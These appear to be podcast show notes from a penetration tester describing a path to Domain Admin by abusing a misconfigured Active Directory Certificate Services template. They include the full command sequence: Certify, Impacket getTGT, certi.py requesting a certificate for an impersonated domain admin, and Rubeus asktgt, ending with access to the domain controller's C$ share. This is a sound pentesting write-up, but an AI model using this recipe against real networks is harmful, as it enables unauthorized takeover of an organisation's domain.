7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

• Grab Certi
• Grab Certify

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!